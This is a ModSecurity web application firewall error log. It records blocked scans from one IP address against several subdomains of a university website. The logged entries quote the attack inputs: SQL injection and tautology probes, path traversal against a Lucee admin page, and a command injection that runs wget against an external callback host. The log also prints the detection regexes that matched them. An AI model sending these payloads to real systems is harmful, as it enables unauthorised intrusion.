[Tue Aug 29 11:30:35.368374 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPpWcwAAAAI"]
[Tue Aug 29 11:30:35.469207 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:search: \\x22;wget http:/cjmn8l5jmimk2adbbnlgp6o9eqtqgdxgu.oast.site';\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search.php"] [unique_id "ZO10a8Co-f0AAAOOuV8AAAAW"]
[Tue Aug 29 11:30:35.484372 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAAPv-EoAAAAM"]
[Tue Aug 29 11:30:35.492257 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPXAmoAAAAi"]
[Tue Aug 29 11:30:35.801371 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPpWc0AAAAI"]
[Tue Aug 29 11:30:36.056491 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPOhZMAAAAa"]
[Tue Aug 29 11:30:36.093404 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10bMCo-f0AAANh1r4AAAAA"]
[Tue Aug 29 11:30:36.176534 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAO876QAAAAF"]
[Tue Aug 29 11:30:36.177025 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPahwMAAAAL"]
[Tue Aug 29 11:30:36.341675 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAO876cAAAAF"]
[Tue Aug 29 11:30:36.346214 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPMmAoAAAAY"]
[Tue Aug 29 11:30:36.354822 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10bMCo-f0AAAPxBSkAAAAS"]
[Tue Aug 29 11:30:36.392804 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAANh1sEAAAAA"]
[Tue Aug 29 11:30:36.392804 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPMmAsAAAAY"]
[Tue Aug 29 11:30:36.395913 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10bMCo-f0AAAPiBgwAAAAB"]
[Tue Aug 29 11:30:36.412741 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10bMCo-f0AAAOOuWUAAAAW"]
[Tue Aug 29 11:30:37.316317 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPpWdIAAAAI"]
[Tue Aug 29 11:30:37.323860 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAOH4UYAAAAH"]
[Tue Aug 29 11:30:37.327560 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAO876kAAAAF"]
[Tue Aug 29 11:30:37.339002 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPMmA0AAAAY"]
[Tue Aug 29 11:30:37.408585 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAOM4XQAAAAU"]
[Tue Aug 29 11:30:37.429441 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPDnyQAAAAP"]
[Tue Aug 29 11:30:37.450470 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPPSwcAAAAd"]
[Tue Aug 29 11:30:37.506001 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPMmA8AAAAY"]
[Tue Aug 29 11:30:37.563953 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bcCo-f0AAAO876wAAAAF"]
[Tue Aug 29 11:30:37.566579 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPPSwgAAAAd"]
[Tue Aug 29 11:30:37.576906 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAOM4XUAAAAU"]
[Tue Aug 29 11:30:37.577301 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnEAAAAi"]
[Tue Aug 29 11:30:37.614977 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnIAAAAi"]
[Tue Aug 29 11:30:37.617533 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPDnyYAAAAP"]
[Tue Aug 29 11:30:37.623063 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAOM4XYAAAAU"]
[Tue Aug 29 11:30:37.635830 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPXAnMAAAAi"]
[Tue Aug 29 11:30:37.640102 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPENeYAAAAQ"]
